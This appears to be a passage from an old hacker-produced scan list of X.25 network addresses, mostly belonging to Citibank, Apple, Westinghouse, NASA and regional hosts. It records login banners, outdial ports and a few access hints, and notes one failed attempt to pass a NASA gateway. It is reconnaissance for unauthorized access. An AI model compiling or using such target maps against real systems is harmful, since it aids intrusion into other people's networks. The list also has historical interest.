- 224 159 CDS DATA PROCESSING SUPPORT
- 224 160 (pad?)
- 224 161 VAX/VMS
- 224 162 Prime
- 224 163 Prime
- 224 164 Prime PRIMENET 22.1.2 WINMIS
- 224 165 GS/1 LTN>
- 224 166 VAX/VMS GLOBAL TREASURY PRODUCTS
- 224 167 VAX/VMS GLOBAL TREASURY PRODUCTS
- 224 168 VAX/VMS Global Report from Citicorp
- 224 170 ELECTRONIC CHECK MANAGER ENTER 'ECM'
- 224 172 CitiMail II - Asia Pacific
- 224 174 PERSONNEL SERVICES & TECHNOLOGY'S DATA PABX NETWORK
- 224 175 Enter T or V for TSO or M for VM/CMS.
- 224 176 DECserver
- 224 177 VAX/VMS Unauthorized Use Is Prohibited
- 224 179 <<please enter logon>>
- 224 180 Citibank N.A. PUERTO RICO
- 224 193 :
- 224 194 VOS CitiShare Milwaukee, Wisconsin
- 224 195 Citimail II
- 224 196 Xyplex X.25 Terminal Server
- 224 197 VAX/VMS
- 224 199
- 224 200 EMULEX TCP/LAT-Compatible Terminal Server
- 224 204
- 224 205 Prime
- 224 207 Communications Subsystem For Interconnection
- 224 210 VOS try "list_users"
- 224 211 Major-BBS User-ID:
- 224 212 Master Policy Bulletin Board
- 224 213 %%%
- 224 214 INDIQUE O TIPO DE TERMINAL
- 224 216 VAX/VMS *** Unauthorized Access Prohibited ***
- 224 217 Prime
- 224 218 DECserver
- 224 220 CHANNEL 01/049. ENTER CHOICE:
- 224 221 BUDAPEST_COSMOS (user 63)
- 224 222
- 224 223 CITIBANK SINGAPORE
- 224 227
- 224 230
- 224 234 VCP-1000 (decserver clone)
- 224 236 CITIBANK LEWISHAM
- 224 237 DECserver
- 224 300 $ CitiMail II
- 224 320 VAX/VMS
- 224 602 VOS list_users
- 224 700 $ CitiMail II (Asia Pacific)
- 224 701 Prime PRIMENET 23.2.0vB DEV-A
- 224 704 Prime PRIMENET 23.2.0vB PROD-C
- 224 3004 Enter destination : node.port or :SFA
- 224 3006 Enter destination : node.port or :SFA
- 224 3010
- 224 3013 London Branch Miniswitch
- 224 3014 CONNECTED TO CITIBANK LONDON
- 224 3016 BMS==>
- 224 3024 BMS==>
- 224 3027 Enter destination : node.port or :SFA
- 224 3032 CITIBANK LONDON
- 224 3035 EMULEX TCP/LAT-Compatible Terminal Server
- 224 3036 EMULEX TCP/LAT-Compatible Terminal Server
- 224 3037 $ Citimail II - C.M.E.A
- 224 3038 $
- 224 3039 $ Citimvs X.25 Gateway
- 224 3043 VAX/VMS UNAUTHORIZED ACCESS to this SYSTEM is PROHIBITED
- 224 3047 Enter destination : node.port or :SFA
- 224 3058 *
- 224 3059 *
- 224 3103 CITIBANK PARIS
- 224 3116 CITICORP/CITIBANK
- 224 3117 VAX/VMS UNAUTHORIZED ACCESS TO THIS SYSTEM IS PROHIBITED
- 224 312 3 *
- 224 3124 CITIBANK MILAN
- 224 3127 CITIBANK MILAN
- 224 3128 *
- 224 3131 CITIBANK FRANKFURT
- 224 3133 CITIBANK FRANKFURT
- 224 3230
- 224 3231
- 224 3235 CITICORP/CITIBANK
- 224 3236 CITICORP/CITIBANK
- 224 4022
- 224 8006 Welcome to Citiswitch, HK
- 224 8008 VAX/VMS GTN gateway/Regional Billing/PCSA/CMG accpt
- 224 8010
- 224 8011 Unix INFOBASE2 login:
- 224 8014 Prime
- 224 8018 *
- 224 8022 *
- 224 8023 *
- 224 8026
- 224 8027
- 224 8030
- 224 8031
- 224 8033
- 224 8034
- 224 8035
- 224 8105 ENTER RESOURCE :
- 224 8106 Global Report from Citicorp
- 224 8122 CITIBANK TOKYO
- 224 8210
- 224 8211 CITIBANK MANILA
- 224 8410 CITIBANK SYDNEY
- 224 8412 CITIBANK SYDNEY
- 224 8414 PLEASE ENTER YOUR ID : -1->
- 224 8415 EMULEX TCP/LAT-Compatible Terminal Server
- 224 8416 Prime
- 224 8509 CITIBANK HONGKONG
- 224 8620
- 224 8621
- 224 8622
- 224 8623
- 224 8624
- 224 8625
- 224 8626
- 224 8627
- 224 8629
- 224 8720 CITIBANK SINGAPORE
- 224 8722 *
- 224 8725 $ COSMOS
- 224 8730 DECserver
- 224 8731 CITIBANK SINGAPORE
- 224 9010 Prime
- 224 9011 VAX/VMS *** Authorized Personnel Only ***
- 224 9150 CITIBANK HONGKONG
-
-
-
-
- 277 - Apple Computer Inc. Scanned: various
-
- ADDRESS OS/SYSTEM PROMPT/RESPONSE/OWNER/ETC LOGIN/PW
- ---------- ----------- -------------------------------------------------
- 277 125J VAX/VMS YODA *AUTHORIZED USERS ONLY*
- 277 127 VAX/VMS Apple Canada Inc.
- 277 128 VAX/VMS For internal use only. CHATTERBOX
- 277 130J VAX/VMS YODA *AUTHORIZED USERS ONLY*
- 277 133 ??? Apple Computer, Inc. X.25 PAD to IP/TCP/TELNET
-
-
-
-
- 301 - Maryland Scanned: [0 - 2000]
-
- ADDRESS OS/SYSTEM PROMPT/RESPONSE/OWNER/ETC LOGIN/PW
- ---------- ----------- -------------------------------------------------
- 301 20 MEDLINE
- 301 21 *
- 301 26 PRIME DNAMD1 Online
- 301 33 VOS United Communications Computer Services Group
- 301 35 User Access Verification Username:
- 301 37 MEDLINE
- 301 40 MEDLINE
- 301 56 U#=
- 301 46 *
- 301 54 VAX/VMS 5.2
- 301 56 U#=
- 301 77 *
- 301 78 *
- 301 100 VOS United Communications Computer Services Group
- 301 125 VAX/VMS
- 301 140 MEDLINE
- 301 150 $ VAX/VMS
- 301 165 *
- 301 170 VOS United Communications Computer Services Group
- 301 253 Prime Primecom Network 19.4Q.111 System 35
- 301 254 Prime Primecom Network 19.4Q.111 System 59
- 301 307 Prime ER!
- 301 310 Prime Primecom Network 19.4Q.106 System 51
- 301 320 Prime Primecom Network 19.4Q.111 System 53
- 301 330 Prime Primecom Network 19.4Q.111 System 30
- 301 331 Prime Primecom Network 19.4Q.111 System 31
- 301 332 Prime Primecom Network 19.4Q.111 System 32
- 301 333 Prime Primecom Network 19.4Q.111 System 33
- 301 335 Prime Primecom Network 19.4Q.111 System 35
- 301 336 VAX/VMS Welcome to VMS 4.6
- 301 341 Prime Primecom Network 19.4Q.111 System 41
- 301 342 Prime Primecom Network 19.4Q.111 System 42
- 301 343 Prime Primecom Network 19.4Q.111 System 43
- 301 344 Prime Primecom Network 19.4Q.111 System 44
- 301 345 Prime Primecom Network 19.4Q.111 System 45
- 301 346 Prime Primecom Network 19.4Q.111 System 46
- 301 351 Prime Primecom Network 19.4Q.111 System 95
- 301 352 Prime Primecom Network 19.4Q.111 System 52
- 301 353 Prime Primecom Network 19.4Q.111 System 53
- 301 356 Prime Primecom Network 18.4Y System 56
- 301 357 Prime Primecom Network 19.4Q.111 System 57
- 301 358 Prime Primecom Network 19.4Q.111 System 58
- 301 361 Prime Primecom Network 19.4Q.111 System 31
- 301 364 Prime Primecom Network 19.4Q.111 System 64
- 301 390 Prime Primecom Network 19.4Q.111 System 90
- 301 391 Prime Primecom Network 19.4Q.111 System 91
- 301 392 Prime Primecom Network 19.4Q.111 System 92
- 301 393 Prime Primecom Network 19.4Q.111 System 93
- 301 394 Prime Primecom Network 19.4Q.111 System 30
- 301 395 Prime Primecom Network 19.4Q.111 System 95
- 301 396 Prime Primecom Network 19.4Q.111 System 96
- 301 397 Prime Primecom Network 19.4Q.111 System 97
- 301 398 Prime Primecom Network 19.4Q.111 System 98
- 301 441 *
- 301 442 *
- 301 443 *
- 301 444 *
- 301 447 *
- 301 448 *
- 301 449 *
- 301 450 *
- 301 455 Unix SysV oldabacis login: (uucp)
- 301 521 $ NETX A000VD03 READY FOR LOGON
- 301 530 PLEASE ENTER LOGIN
- 301 535A
- 301 546 *
- 301 548
- 301 558 *
- 301 559 *
- 301 560 *
- 301 563 $ VM/CMS? INVALID-SW-CHARS
- 301 565 Unix E.T.Net/The National Library of Medicine.
- 301 1130
- 301 1131
- 301 1134 *
- 301 1136 *
- 301 1139 8001A69E
- 301 1142 9769AFC6
- 301 1153 *
- 301 1230 You are not authorized to connect to this machine.
- 301 1241 Fannie Mae
- 301 1243 USER ID
- 301 1244 *
- 301 1245 *
- 301 1253 *
- 301 1551 *
- 301 2040 *
- 301 2042 *
-
-
-
-
- 302 - Delaware Scanned: 0 - 300
-
- ADDRESS OS/SYSTEM PROMPT/RESPONSE/OWNER/ETC LOGIN/PW
- ---------- ----------- -------------------------------------------------
- 302 41 $ (running same/similar software as tymnet)
-
-
-
-
- 303 - Colorado Scanned: 0 - 1000
-
- ADDRESS OS/SYSTEM PROMPT/RESPONSE/OWNER/ETC LOGIN/PW
- ---------- ----------- -------------------------------------------------
- 303 21 $ outdial (303)
- 303 33 Password >
- 303 47 *
- 303 114 $ outdial (303)
- 303 115 $ outdial (303)
- 303 120 Prime PRIMENET 22.1.3.R35 SAMSON
- 303 140 X29 Password:
- 303 141 *
- 303 142 *
- 303 242 $ VAX/VMS AZTEK Engineering MicroVAX (AZTKD1)
- 303 268 *
- 303 330 *
- 303 333 *
- 303 338 *
- 303 561 Prime PRIMENET 22.1.1.R11 SPARKY
- 303 579 Prime PRIMENET 22.1.3.R35 CAESAR
- 303 800 *
-
-
-
-
- 304 - West Virginia Scanned: [0 - 300]
-
- ADDRESS OS/SYSTEM PROMPT/RESPONSE/OWNER/ETC LOGIN/PW
- ---------- ----------- -------------------------------------------------
- 304 101 ENTER: ASV2, ASV3 OR MPL780
- 304 130 ENTER: ASV2, ASV3 OR MPL780
-
-
-
-
- 305 - Florida Scanned: 0 - 2000
-
- ADDRESS OS/SYSTEM PROMPT/RESPONSE/OWNER/ETC LOGIN/PW
- ---------- ----------- -------------------------------------------------
- 305 4 USER ID
- 305 34 USER ID
- 305 59 .INVALID COMMAND
- 305 105 $ outdial (305)
- 305 106 $ outdial (305)
- 305 120 $ outdial (305)
- 305 121 $ outdial (305)
- 305 122 $ outdial (305)
- 305 135 *
- 305 140 .INVALID COMMAND
- 305 141 Select Desired System:
- 305 142 USER ID
- 305 145 USER ID
- 305 149 hp-x000 S901.NET.BUC
- 305 150 *
- 305 156 USER ID
- 305 162 WN01000000000000000000000000000
- 305 170 *
- 305 171 VM/CMS? ENTER SWITCH CHARACTERS
- 305 172 WN01000000000000000000000000000
- 305 175 USER ID
- 305 177 WN01000000000000000000000000000
- 305 178 hp-x000 S901.NET.BUC
- 305 237 Comcast Information Services
- 305 241 WN01000000000000000000000000000
- 305 245 *
- 305 247
- 305 250 Unix
- 305 339 CONNECTED TO PACKET/74
- 305 347 CONNECTED TO PACKET/74
- 305 362 CLARIONET Userid : new
- 305 363 CLARIONET
- 305 364 CLARIONET
- 305 365 CLARIONET
- 305 366 CLARIONET
- 305 370 $
- 305 371 VAX/VMS Usuario :
- 305 372 $ VAX/VMS ORL001
- 305 471
- 305 472 $ HP-3000 MIA.MIA.EI
- 305 700
- 305 1036 CONNECTED TO PACKET/74
- 305 1037 CONNECTED TO PACKET/74
- 305 1043 Unix
- 305 1040 USER ID
- 305 1242 AOS
- 305 1243 *
- 305 1244 Prime PRIMENET 22.1.3 DZ-MIA
-
-
-
-
- 309 - Illinois Scanned: [0 - 200]
-
- ADDRESS OS/SYSTEM PROMPT/RESPONSE/OWNER/ETC LOGIN/PW
- ---------- ----------- -------------------------------------------------
- 309 30 *
-
-
-
-
- 312 - Illinois Scanned: [0 - 1500]
-
- ADDRESS OS/SYSTEM PROMPT/RESPONSE/OWNER/ETC LOGIN/PW
- ---------- ----------- -------------------------------------------------
- 312 34 YOUR ENTRY IS INCORRECT.
- 312 35 $ TSO
- 312 37 *
- 312 40
- 312 41 YOUR ENTRY IS INCORRECT.
- 312 45 YOUR ENTRY IS INCORRECT.
- 312 53 TSO COMMAND UNRECOGNIZED
- 312 54 TSO
- 312 59 Id Please:
- 312 64 $ Purdue Annex (*.cc.purdue.edu)
- 312 65 $ MSG 1: COMMAND INVALID FROM PHTIB010
- 312 74 *
- 312 75 *
- 312 77 $ USER ID
- 312 78 $ USER ID
- 312 121 enter system id --
- 312 125 *
- 312 131 VM/CMS SYSTEMV
- 312 150 PLEASE ENTER SUBSCRIBERID;PASSWORD
- 312 159 PLEASE ENTER SUBSCRIBERID;PASSWORD
- 312 160 USERID:
- 312 170 $ VAX/VMS This is SKMIC4 - Authorized use only
- 312 233 USERID:
- 312 235
- 312 240 *
- 312 245 *
- 312 253 *
- 312 254 *
- 312 256 PLEASE LOGIN
- 312 257 *
- 312 258 ID:
- 312 269 CUSTOMER ID:
- 312 270 CUSTOMER ID:
- 312 271 CUSTOMER ID:
- 312 350 *
- 312 351 TSO
- 312 354 *
- 312 378 BAXTER ASAP SYSTEM (LINE EG75)
- 312 379 TSO
- 312 398 $ MHP201A ITVI0180 * VERSION 6.0.2 *.
- 312 400 BAXTER ASAP SYSTEM (LINE EGC7)
- 312 401 BAXTER ASAP SYSTEM (LINE EG4D)
- 312 402 BAXTER ASAP SYSTEM (LINE EGC5)
- 312 403 TSO
- 312 405 TSO
- 312 410 $ outdial (312)
- 312 411 $ outdial (312)
- 312 451 TSO
- 312 452 BAXTER ASAP SYSTEM (LINE EGED)
- 312 475 *
- 312 476 *
- 312 477 $ USER ID
- 312 520 Unix R59X01 login:
- 312 521 Unix R58X01 login:
- 312 522 Unix R67X01 login:
- 312 524 Unix R51X01 login:
- 312 525 Unix R41X01 login:
- 312 526 PASSWORD
- 312 528 PASSWORD
- 312 530 *
- 312 531 *
- 312 532 $ VAX/VMS
- 312 533 *
- 312 534 $ (echo)
- 312 535 $ (echo)
- 312 536 $ (echo)
- 312 537 $ (echo)
- 312 538 $ (echo)
- 312 585 *
- 312 587 *
- 312 588 *
- 312 589 *
- 312 655 TSO
- 312 740 TELENET ASYNC TO 3270 SERVICE
- 312 762 *
- 312 763 *
- 312 764 *
- 312 765 *
- 312 766 *
- 312 767 *
- 312 768 *
- 312 769 *
- 312 770 $ TELENET ASYNC TO 3270 SERVICE
- 312 772 $ TELENET ASYNC TO 3270 SERVICE AB-NET
- 312 1130 Unix R52X01 login:
- 312 1131 Unix R61X01 login:
- 312 1132 Unix R63X01 login:
- 312 1133 Unix R40X01 login:
- 312 1134 Unix R43X01 login:
- 312 1135 Unix R46X01 login:
- 312 1139 Unix R65X01 login:
- 312 1140 Unix R54X01 login:
- 312 1141 Unix R71X01 login:
- 312 1142 Unix R56X01 login:
- 312 1143 Unix R55X01 login:
- 312 1144 Unix R48X01 login:
- 312 1150 Unix R47X01 login:
- 312 1151 Unix R62X01 login:
- 312 1152 Unix R45X01 login:
- 312 1153 Unix R42X01 login:
- 312 1154 Unix R74X01 login:
- 312 1155 Unix R60X01 login:
- 312 1177 *
- 312 1179 *
- 312 1232 REQUEST IN VIOLATION OF SYSTEM SECURITY STANDARDS
- 312 1233 REQUEST IN VIOLATION OF SYSTEM SECURITY STANDARDS
- 312 1250 YOUR ENTRY IS INCORRECT.
- 312 1251 YOUR ENTRY IS INCORRECT.
- 312 1258 Prime PRIMENET 23.2.0.r26 HS6650
- 312 1259 ENTER ID (Westlaw)
- 312 1270 *
- 312 1271 *
- 312 1272 *
- 312 1275 *
- 312 1301 MHP201A A00B1001 * VERSION 5.5.3 *.
- 312 1302 MHP201A A00B1101 * VERSION 5.5.3 *.
- 312 1303 MHP201A A00B1101 * VERSION 5.5.3 *.
- 312 1304 MHP201A A00B1101 * VERSION 5.5.3 *.
- 312 1305 MHP201A A00B1101 * VERSION 5.5.3 *.
- 312 1306 MHP201A A00B1101 * VERSION 5.5.3 *.
- 312 1307 MHP201A A00B1101 * VERSION 5.5.3 *.
- 312 1308 MHP201A A00B1101 * VERSION 5.5.3 *.
- 312 1309 MHP201A A00B1101 * VERSION 5.5.3 *.
- 312 1310 MHP201A A00B1101 * VERSION 5.5.3 *.
- 312 1311 MHP201A A00B1101 * VERSION 5.5.3 *.
- 312 1340 *
- 312 1341 ENTER ID (Westlaw)
- 312 1534 *
- 312 1535 *
-
-
-
-
- 313 - Michigan Scanned: [0 - 2000]
-
- ADDRESS OS/SYSTEM PROMPT/RESPONSE/OWNER/ETC LOGIN/PW
- ---------- ----------- -------------------------------------------------
- 313 24 $ outdial (313)
- 313 40 Autonet Line 3130095084
- 313 41 Autonet Line 3130095084
- 313 62 Merit:X.25 Gateway
- 313 75 *
- 313 82 Enter "CMS userid", "TSO userid ", "SIMVTAM termid"
- 312 219 enter system id --
- 313 101 $ outdial (313)
- 313 111 $ outdial (313)
- 313 140 $ USER ID
- 313 144 $ DTC DTCHQ02.WD.WD
- 313 145 Please enter your Access Code ?
- 313 146 Please enter your Access Code ?
- 313 148 PLEASE ENTER SUBSCRIBERID;PASSWORD
- 313 152 Unix/SunOS SPRINT.COM SunLink X.29 service
- 313 153 MHP1201I TERMINAL CONNECTED TO PACKET/74
- 313 160 PASSWORD (this will hang you up)
- 313 164 VU/TEXT
- 313 165 *
- 313 171 U#=
- 313 173 VAX/VMS IPP VAX/VMS V5.4-3 SYSTEM VIP012
- 313 202 Merit:X.25 Gateway
- 313 214 $ outdial (313)
- 313 216 $ outdial (313)
- 313 239 Unix Valenite
- 313 250 HP-3000
- 313 330 $ Unix Domino's Pizza Distribution Corp
- 313 350 *
- 313 351 *
- 313 352 *
- 313 353 *
- 313 354 *
- 313 355 *
- 313 365 Unix/SunOS This is our latest and greatest X.29 service
- 313 705 OS4000 5.5 Logging in user
- 313 800 Prime PRIMENET 22.1.4.R39v D1D2
- 313 1020 USER ID
- 313 1021 USER ID
- 313 1032 *
- 313 1162 Unix R44X01 login:
- 313 1163 Unix R69X01 login:
- 313 1164 Unix R50X01 login:
- 313 1165 Unix R57X01 login:
- 313 1166 Unix R64X01 login:
- 313 1167 Unix R66X01 login:
- 313 1169 Unix R70X01 login:
- 313 1170 Unix R73X01 login:
- 313 1171 Unix R75X01 login:
- 313 1172 Unix R72X01 login:
- 313 1174 Unix R77X01 login:
- 313 1175 Unix/SysV (jupiter)
- 313 1176 Unix aries login:
- 313 1177 Unix hermes login:
-
-
-
-
- 314 - Missouri Scanned: [0 - 300]
-
- ADDRESS OS/SYSTEM PROMPT/RESPONSE/OWNER/ETC LOGIN/PW
- ---------- ----------- -------------------------------------------------
- 314 139 *
- 314 143 $ ??? Please log in (or type "/DOC/DEMO").
- 314 260
-
-
-
-
- 315 - New York Scanned: [0 - 300]
-
- ADDRESS OS/SYSTEM PROMPT/RESPONSE/OWNER/ETC LOGIN/PW
- ---------- ----------- -------------------------------------------------
- 315 20 (echo)
- 315 32 $ COMMAND UNRECOGNIZED
- 315 50 $ SIM3278
- 315 135 (echo)
- 315 136 (echo)
- 315 137 $ GTE CAMILLUS NY
- 315 138 CONNECTED TO PACKET/94
- 315 145 VAX/VMS Username:
- 315 149 $ GTE CAMILLUS NY
- 315 150 GTE CAMILLUS NY
- 315 151 GTE CAMILLUS NY
- 315 152 (echo)
- 315 162 CONNECTED TO PACKET/400
- 315 172 *
- 315 231
-
-
-
-
- 317 - Indiana Scanned: [0 - 300]
-
- ADDRESS OS/SYSTEM PROMPT/RESPONSE/OWNER/ETC LOGIN/PW
- ---------- ----------- -------------------------------------------------
- 317 55 $ outdial (317)
- 317 113 $ outdial (317)
- 317 114 $ outdial (317)
- 317 127 VTAM/M02
- 317 134 $ Prime PRIMENET 22.0.4.R8 PENTEK
- 317 136 *
- 317 140 VAX/VMS
- 317 142 *
- 317 143 $ (hangs up)
- 317 145 Prime PRIMENET 22.1.3 ARVN01
- 317 148 USER ID
- 317 154 VAX/VMS
- 317 157 *
- 317 159 *
- 317 164 $ (hangs up)
- 317 174
- 317 235 $ CONNECTED TO PACKET/74
- 317 251 CONNECTED TO PACKET/400
- 317 253 *
- 317 255
- 317 260 Unix SIL_CHI
- 317 299 ASYNC to whatever -- (try logical unit=9)
- 317 335 VAX/VMS
- 317 336 *
-
-
-
-
- 321 - SPAN/NASA Scanned: [N/A]
-
- ADDRESS OS/SYSTEM PROMPT/RESPONSE/OWNER/ETC LOGIN/PW
- ---------- ----------- -------------------------------------------------
- 321 Note: Access to SPAN now passes through a network
- validation gateway. I was unable to get passed
- this, and unable to scan this prefix.
- Here is the friendly message you get on attempts:
-
- Entering the NASA Packet Switching System (NPSS)
- Please Report Service Access Problems To (205) 544-1771
-
- <insert large warning banner>
-
- USERID>
- PASSWORD>
- SERVICE>
-
-
-
-
- 401 - Rhode Island Scanned: [0 - 300]
-
- ADDRESS OS/SYSTEM PROMPT/RESPONSE/OWNER/ETC LOGIN/PW
- ---------- ----------- -------------------------------------------------
- 401 50 *
- 401 230 *
-
-
-
-
- 402 - Nebraska Scanned: [0 - 300]
-
- ADDRESS OS/SYSTEM PROMPT/RESPONSE/OWNER/ETC LOGIN/PW
- ---------- ----------- -------------------------------------------------
- 402 47
- 402 57 Unix NCR 386/486 System name: tower12
- 402 131 *
- 402 231 *
-
-
-
-
- 404 - Georgia Scanned: [0-700]
-
- ADDRESS OS/SYSTEM PROMPT/RESPONSE/OWNER/ETC LOGIN/PW
- ---------- ----------- -------------------------------------------------
- 404 55 *
- 404 57
- 404 59
- 404 70
- 404 77
- 404 79
- 404 143
- 404 171
- 404 235.1 Port Selec The Journal Of Commerce
- 404 235.2 VAX/VMS Nedlloyd Lines Region Management North America
- 404 244
- 404 247
- 404 250.1 CUSTOMER ID:
- 404 250.2 (garbage)
- 404 251.1 CUSTOMER ID:
- 404 252.1 CUSTOMER ID:
- 404 262.2 TACL 1>
- 404 263.2 TACL 1>
- 404 264.2 TACL 1>
- 404 265.2 TACL 1>
- 404 266.2 TACL 1>
- 404 349 Prime PRIMENET 22.1.3 EHPATL
- 404 358
- 404 359
- 404 372 VOS
- 404 373 VOS
- 404 374 *
- 404 560 VAX/VMS
- 404 633 VAX/VMS
- 404 635 VAX/VMS
-
-
-
-
- 405 - Oklahoma Scanned: [0 - 300]
-
- ADDRESS OS/SYSTEM PROMPT/RESPONSE/OWNER/ETC LOGIN/PW
- ---------- ----------- -------------------------------------------------
- 405 45 ENTER SESSION ESTABLISHMENT REQUEST :
- 405 46 TACL 1>
- 405 130 *
- 405 242 VAX/VMS
- 405 245 *
- 405 246
- 405 248 *
- 405 249 *
-
-
-
-
- 408 - California Scanned: [0 - 1500]
-
- ADDRESS OS/SYSTEM PROMPT/RESPONSE/OWNER/ETC LOGIN/PW
- ---------- ----------- -------------------------------------------------
- 408 21 $ outdial (408)
- 408 31 *
- 408 45 $ HP-3000 SPECTRA-PHYSICS LASERS
- 408 49 *
- 408 61
- 408 77 $ USER ID
- 408 110 $ outdial (408)
- 408 111 $ outdial (408)
- 408 121 HP-3000 SAGAN.HP.COM
- 408 127 Unix
- 408 133 $ (echo)
- 408 159 $ VAX/VMS
- 408 177 *
- 408 235 AOS GLOBAL WEATHER MV3
- 408 238 Unix
- 408 260 *
- 408 261 *
- 408 264 Portal Communications Company. NEW/INFO/HELP
- 408 267 *
- 408 268 *
- 408 271
- 408 273
- 408 335 VAX/VMS CONNECTING TO NODE: LTCTST
- 408 342 $ Unix/SunOS (OSI)
- 408 343 $ VTAM Amdahl Corporate Computer Network
- 408 344 $ VAX/VMS ANDO running VMS V5.4-2
- 408 346 Unix IGC Networks login:new password:<cr>
- 408 352 $ VTAM Amdahl Corporate Computer Network
- 408 356 *
- 408 357 *
- 408 378 Unix X.25 PAD (pad echo)
- 408 450 Unix HP-UX moe
- 408 444 $ HP-3000 Finnigan Corporation
- 408 445 $ VAX/VMS GEC PLESSEY Semiconductors
- 408 449 VAX/VMS Friden Neopost (Node: PRDSYS)
- 408 450 Unix HP-UX moe
- 408 456 *
- 408 530 *
- 408 531 *
- 408 532 *
- 408 534 $ DTC DTC02.DOMAIN.ORGANIZATION
- 408 539 User Access Verification Password:
- 408 1050
- 408 1046 *
- 408 1050
- 408 1051
- 408 1052
- 408 1053
- 408 1054 Port Selec First Image
- 408 1055
- 408 1060 $ REQUESTED APPLICATION NOT DEFINED
- 408 1061 $ REQUESTED APPLICATION NOT DEFINED
- 408 1062 $ REQUESTED APPLICATION NOT DEFINED
- 408 1063 $ REQUESTED APPLICATION NOT DEFINED
- 408 1064 $ REQUESTED APPLICATION NOT DEFINED
- 408 1065 $ REQUESTED APPLICATION NOT DEFINED
- 408 1066 $ REQUESTED APPLICATION NOT DEFINED
- 408 1067 $ REQUESTED APPLICATION NOT DEFINED
- 408 1068 $ REQUESTED APPLICATION NOT DEFINED
- 408 1069 $ REQUESTED APPLICATION NOT DEFINED
- 408 1071 $ (echo)
- 408 1072 $ (echo)
- 408 1076 $ (echo)
- 408 1230 $ (echo)
- 408 1231 $ (echo)
- 408 1234 $ (echo)
- 408 1235 $ (echo)
- 408 1238 *
- 408 1240 $ (hangs up)
- 408 1350 VAX/VMS
-
-
-
-
- 410 - RCA? MCI? Scanned: [0-300+]
-
- ADDRESS OS/SYSTEM PROMPT/RESPONSE/OWNER/ETC LOGIN/PW
- ---------- ----------- -------------------------------------------------
- 410 0 MCI YR ID?
-
-
-
-
- 412 - Pennsylvania Scanned: [0 - 1000]
-
- ADDRESS OS/SYSTEM PROMPT/RESPONSE/OWNER/ETC LOGIN/PW
- ---------- ----------- -------------------------------------------------
- 412 30 USER ID
- 412 33 VAX/VMS Lender's Service, Inc. Computer System
- 412 34 $ ACF/VTAM Lord Corp IBM Network
- 412 51 *** ENTER LOGON
- 412 52 *** ENTER LOGON
- 412 55 COMMAND UNRECOGNIZED
- 412 60 PC2LAN Connected to Router Pit
- 412 61 %@CVTTAUD@dUYECVGUIiED
- 412 63 %@CVTTAUD@dUYECVGUIiED
- 412 67 SIM3278 Mellon Bank
- 412 70 *
- 412 78 #
- 412 79 #
- 412 130
- 412 153 *** ENTER LOGON
- 412 201 $ outdial (412)
- 412 202 $ outdial (412)
- 412 230 VAX/VMS You are connected to a private system.
- 412 231 $ Prime PRIMENET 22.1.3.r13 MECO
- 412 335 *
- 412 336 Renex Connect, SN-00300371
- 412 340 SIM3278 Mellon Bank
- 412 342 COMMAND UNRECOGNIZED FOR T11310T0
- 412 349 *** ENTER LOGON
- 412 352 *** ENTER LOGON
- 412 440 Unix/SysV X.29 Terminal Service (dxi-m1)
- 412 708 Unix/SysV X.29 Terminal Service (dxi-m1)
-
-
-
-
- 414 - Wisconsin Scanned: [0 - 300]
-
- ADDRESS OS/SYSTEM PROMPT/RESPONSE/OWNER/ETC LOGIN/PW
- ---------- ----------- -------------------------------------------------
- 414 20 $ outdial (414)
- 414 21 $ outdial (414)
- 414 36 *
- 414 46 $ Prime PRIMENET 22.1.4-SC1 SYSU
- 414 49 CONNECTED TO MMISC
- 414 60 User Name? (MGIC)
- 414 120 $ outdial (414)
- 414 165 USER ID
- 414 170 *
- 414 241 *
- 414 242 *
-
-
-
-
- 415 - California Scanned: [0 - 1500]
-
- ADDRESS OS/SYSTEM PROMPT/RESPONSE/OWNER/ETC LOGIN/PW
- ---------- ----------- -------------------------------------------------
- 415 5 $ outdial (415)
- 415 7 HP-3000 EXPECTED HELLO, :JOB, :DATA, OR (CMD) AS LOGON.
- 415 11 $ outdial (415)
- 415 20 Dialog Information Services
- 415 23 $ outdial (415)
- 415 27 Stanford Data Center (SYSA), Forsythe Hall.
- 415 29A Stanford University Hospital System (SUH/SYSC).
- 415 31 You are not authorized to connect to this system
- 415 35 (echo)
- 415 38 DTC04.LSI.NET
- 415 48 Dialog Information Services
- 415 49 Dialog Information Services
- 415 53B VAX/VMS Username:
- 415 54 USER ID
- 415 56 CONNECTED TO PACKET/74
- 415 68A VAX/VMS Username:
- 415 74 *
- 415 108 $ outdial (415)
- 415 109 $ outdial (415)
- 415 131 $ HP-3000
- 415 153 CONNECTED TO PACKET/94
- 415 165 *
- 415 167 Prime PRIMENET 22.1.3 VESTEK
- 415 168 Unix Vestek
- 415 174 *
- 415 175 Dialog Information Services
- 415 215 $ outdial (415)
- 415 216 $ outdial (415)
- 415 217 $ outdial (415)
- 415 224 $ outdial (414)
- 415 232 Unix pandora
- 415 234 $ Unix UNIX System V Release 1.0-92b011 AT&T MIServer-S
- 415 475 Prime PRIMENET 22.1.3.R21 CORP.1
- 415 476 *
- 415 569 DACS
- 415 1030 Prime
- 415 1052 *
- 415 1053 HP-3000
- 415 1057 $ VAX/VMS
- 415 1069 *
- 415 1252 *
- 415 1255 $ DTC ERROR: User not authorized
- 415 1262 $ ??? ???
- 415 1268 TACL 1>
- 415 1269 TACL 1>
- 415 1356 *
- 415 1357 *
- 415 1600 USER ID
-
-
-
-
- 422 - Westinghouse Scanned: various
-
- ADDRESS OS/SYSTEM PROMPT/RESPONSE/OWNER/ETC LOGIN/PW
- ---------- ----------- -------------------------------------------------
- 422 101.1 ENTER PASSWORD
- 422 104 DTC Type 'H' or '?' for HELP
- 422 105 CONNECTED TO PACKET/74
- 422 106 GS/1 FASD >
- 422 115 Westinghouse X.25 Network WCIS Gandalf pad 422115
- 422 122
- 422 123 VM/XA Westinghouse Corporate Computer Services
- 422 129 COMMTEX Cx-80 DATA EXCHANGE
- 422 131.1 annex tcc_inn>
- 422 131.2 >
- 422 131.3
- 422 131.4 Network Access DSU/CSU (menu driven need vt100)
- 422 131.5 uGn
- 422 131.6
- 422 131.7 MJgsonnesvev>3=9>722>?=3=>7/3=9>7?=????7
- 422 135.5
- 422 135.6 annex tcc_hub>
- 422 135.7 ** USER NOT LOGGED ON
- 422 135.10 ** USER NOT LOGGED ON
- 422 135.20 annex tcc_hub>
- 422 135.30
- 422 137.1 annex credit>
- 422 137.4
- 422 137.5 ??? < (try '?')
- 422 137.9 annex credit1>
- 422 138 Select Destination:
- 422 139 VM/XA Westinghouse Corporate Computer Services
- 422 150
- 422 154
- 422 165
- 422 166
- 422 167
- 422 168
- 422 169
- 422 180 WESTINGHOUSE SNA NETWORK - ENTER: L APPLNAME
